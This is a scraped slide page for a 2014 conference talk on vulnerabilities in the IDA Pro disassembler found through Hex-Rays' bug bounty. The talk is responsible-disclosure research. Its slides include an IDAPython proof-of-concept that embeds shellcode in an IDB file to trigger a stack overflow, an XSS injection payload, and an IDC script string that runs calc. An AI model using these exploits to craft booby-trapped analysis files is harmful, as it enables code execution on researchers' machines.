IDA Vulnerabilities and Bug Bounty  by Masaaki Chida

67 %
33 %
Information about IDA Vulnerabilities and Bug Bounty  by Masaaki Chida

Published on March 12, 2014

Author: codeblue_jp



IDA Pro is an advanced disassembler software and often used in vulnerability research and malware analysis. IDA Pro is used to analyse software behavior in detail, if there was a vulnerability and the user is attacked not only can it have impact in a social sense but also impact legal proceedings. In this presentation I will discuss the vulnerabilities found and attacks leveraging the vulnerabilities and Hex-rays's remediation process and dialogue I had with them.

IDA’s Vulnerabilities and Bug Bounty Program Masaaki Chida

Profile !  Security Engineer !  Interested in Reverse Engineering !  Participant in the sutegoma2 CTF team

What is IDA? !  Fully Featured Disassembler !  Static analysis software used for analyzing malware etc. !  Hex-rays’ Bug Bounty Program !  3000 USD Reward !  Rewards for remote attacks against IDA and the Hex-rays Decompiler !  Started around February 2011 !  By January 2014, there were 11 bounties awarded

Bug Bounty Program Impressions !  Identified various types of vulnerabilities, more than expected !  Hex-rays responded rapidly !  During normal business hours, email replies were immediate !  They also sent patches if the fixes were quick !  Parts that were difficult !  Creating the proof of concept exploit code !  Reproducing file formats !  Writing reports !  English !  Writing vulnerability details for people other than security engineers

Research Methodology !  Analysis in IDA !  IDA Main Program (for windows) !  Loader Modules !  Processor Modules !  Plugins !  Read the SDK plugins’ source code !  Observed the running processes’ actions !  Sysinternals Tools: Procmon

Investigating functions that handle IO !  Data Read & Copy !  read, lread, eread, qread, qlread, qfread, !  memcpy, strcpy, strncpy, qstrncpy, … !  IDB Database !  get_long, get_byte, ger_many_bytes, !  netnode_getblob, netnode_altval, netnode_supval, !  unpack_dd, unpack_ds, unpack_dw, … !  Heap Allocation !  malloc, calloc, realloc !  qalloc, qcalloc, qrelloc !  qvecto_reserve

Script and command execution functions !  IDC Script !  CompileEx, CompileLineEx !  str2ea, calcexpr, calcexpr_long, calc_idc_expr, !  Eval, ExecIDC, Execute File, Execute Line,… !  Command Execution !  call_system !  system, CrateProcess,…

Summary of Identified IDA Vulnerabilities !  Heap Overflow => Many !  Stack Overflow => 2 !  DLL, Script Preloading => Many !  Path Traversal => Several !  Automatic IDC script execution !  Automatic debugger execution !  ※These include bugs that were not eligible for bounty rewards

Integer Overflow Vulnerabilities !  Problems !  Almost all modules were a target !  No integer overflow protections !  Even functions like qcalloc were unprotected By exploiting buffer overflows it is possible to execute arbitrary code in many of the modules void *__cdecl qcalloc(size_t nitems, size_t itemsize) { void *result; // eax@2 void *v3; // ebx@3 if ( (signed int)(itemsize * nitems) > 0 ) { v3 = calloc(itemsize * nitems, 1u);

Integer Signedness Vulnerability !  Problem !  Target was the AIF Loader Module !  Stack buffer overflow occurs during analysis of the section name By exploiting the stack based buffer overflow it was possible to execute arbitrary code.

Classic Buffer Overflow Vulnerabilities !  Problems !  Target was the .NET Processor Module !  Binary to hex string conversion process !  netnode_getblob() did not validate the size of the input data By exploiting stack based buffer overflows it was possible to execute arbitrary code

Classic Buffer Overflow Vulnerability !  #For Windows XP SP3 Japanese Edition !  from idaapi import *;from struct import * !  a = 0x5874768A-0x24; b = 0x5874764A-0x14 !  shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01f RDfhpQDTY09fh3NfXf50rfPfharfXf5dsfPDTY09hBzPKX5ceLJPDfhptDfh9tDTY01fh6Of Xf5jAfPDTY09hinEufhKWDfhkdfXf5WcfPfhnLfXf5g2fPDTY09fhgRDTY01fhQBfhdtfXf5 QXfPDfhlHDTY09fhaefXf57jfPDfh5PfXf5lVfPDTY09h7YqoX5RFUnPDfhjLDfhttDTY09f h8wfXf5PvfPDTY09h3YIXX54FiYPDfhatDfhgtDTY01fh7xDfh8pfXf5dofPfhitDTY09fhl zfXf53FfPfhYtDTY09fhGSfXf59KfPfhWtDTY01fhG0DfhRtTYf19fh3ZfXf55VfPDfhnvDf h5tDTY01fh6tfXf5FxfPDfhRvDfhJtDTY09fhr0fhCtDTY01hJRVdDfhlKfXf5MRfPDTY09f hUvDTY09fhmwDfhB4fXf5xhfPhdohchshinfhUifXf5C5fPDhehwshhystfhYjfXf5I6fPDh hm32hcalchexehfhTHfXf54ffPDfhRhfhKifXf5YDfPDTY09fhU1DRVWRTFfVNfhjsfXf5Er fPVUafhrWfYf1Lo9f1To9TXLLLrH“ !  payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("x55"*6) !  payload+=shellcode !  payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+ (pack("II",a,b)*(16000/8)) !  node_id=netnode("$ cli").altval(0x0C000014,'o') !  netnode(node_id).setblob(payload,0,'o') !  IDAPython script that inserts shellcode into an IDB file

HTML Injection Vulnerability !  Problem !  Possible to inject arbitrary HTML when exporting analysis to HTML !  HTML entities were not being escaped !  get_root_filename function !  Qbasename function exhibits odd behavior !  Calling qbasename(“x00:/path/filename”) returns “/path/filename” Possible to execute XSS when opening the generated HTML file from idaapi import * node=netnode("Root Node") node.set(“x00:</title><scritp>alert('XSS')</script>") save_database()

Preloading Vulnerability !  Problem !  Automatically loads DLLs, IDC and IDAPython scripts from the same directory containing the IDB file !  ida.idc, userload.idc !  windbg.exe, dbghelp.dll, dbgeng.dll, … !,,, … Possible to automatically read/execute unintended files, allowing for arbitrary code execution

Problems with Debugger Settings !  Problem !  Debug target applications can be UNC paths !  The flag to ignore debugger startup warnings is saved in the IDB file Possible to run a malicious remote file without any warning messages using the runtime debugger

Automatic Debugger Execution Vulnerability !  Problem !  Debugger is automatically run during memory dump analysis !  Automatic evaluation of debugger events !  Event Condition,Watch PointView Possible to execute malicious IDC script when loading an IDB file made from a memory dump

Automatic IDC Script Execution Vulnerability !  Problem !  Target was the .NET Processor Module !  Using IDA’s hint dialog !  1. get string of text below the line of the cursor !  2. Pass it to the extract_name function !  3. Pass it to the str2ea function !  Behavior of the extract_name function is different !  Control characters present in the NameChars item within ida.cfg !  IDC Script is implicitly run from the str2ea function parameters Possible to execute malicious script when parsing .NET files str2ea calcexpr_lon g calc_idc_expr CompileLine Ex Run

Behavioral Differences in extract_name [X86, ARM Processor Module, etc…] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec --------------------------------------------------------------- .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, … .text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0 [.NET Processor Module] Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63)) --------------------------------------------------------------- .method private static hidebysig void Main(string[] args) {     ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“ } When positioning the cursor over ”db ‘Exec(char(0x63…” in x86, nothing occurs. Internally, str2ea(‘Exec’) is executed. However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…” causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is executed.


Summary !  Lots of easy to find vulnerabilities still exist !  I think bug bounty programs help in reducing vulnerability !  I want there to be more bug bounty programs !  There are other bug bounty programs already running !  Those who are interested should join!


#for presentations

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

Hex-Rays Security Bug Bounty Program

Hex-Rays Security Bug Bounty Program. ... Masaaki Chida IDA 5.7 and 6.0 Multiple vulnerabilities 2011-02-20... Masaaki Chida
Read more

(eBook) - By Masaaki Hatsumi - Ninjutsu - Kukishinden Ryu ...

... By Masaaki Hatsumi - Ninjutsu - Kukishinden Ryu. ... Toshitsugu Takamatsu and Masaaki Hatsumi-The Essence ... IDA Vulnerabilities and Bug Bounty by ...
Read more

Bug Bounty | LinkedIn

WhatsApp Security Vulnerabilities & Bug Bounty. ... for reporting bugs/vulnerabilities in their code ... and Bug Bounty by Masaaki Chida. 1,718 ...
Read more

Code Blue 2014 - Concise Courses

Code Blue 2014 According to the ... Networked Home Appliances and Vulnerabilities: ... Masaaki Chida: IDA Vulnerabilities and Bug Bounty: Tomoyuki Shigemori:
Read more

Winter by Masaaki Kishibe - Documents

Share Winter by Masaaki Kishibe. ... Winter Masaaki Kishibe Growing Up 1/6 Moderate = 120 ... IDA Vulnerabilities and Bug Bounty by ...
Read more

rewards hack -

... //;4. Bug Bounty Program?IDA Vulnerabilities and Bug Bounty by Masaaki Chida-SlideShare ...
Read more

Imai masaaki - Documents - DOCSLIDE.US

En 1986 Masaaki Imai funda el KAIZEN® Institute que se dedica ... IDA Vulnerabilities and Bug Bounty by Masaaki ... IDA Pro is used to analyse ...
Read more

Schedule - Time Table - CODE BLUE

Schedule - Time Table ... Appliances and Vulnerabilities. Yukihisa Horibe: SHORT SESSION; 14:30 - 14:50: IDA Vulnerabilities and Bug Bounty Masaaki Chida: ...
Read more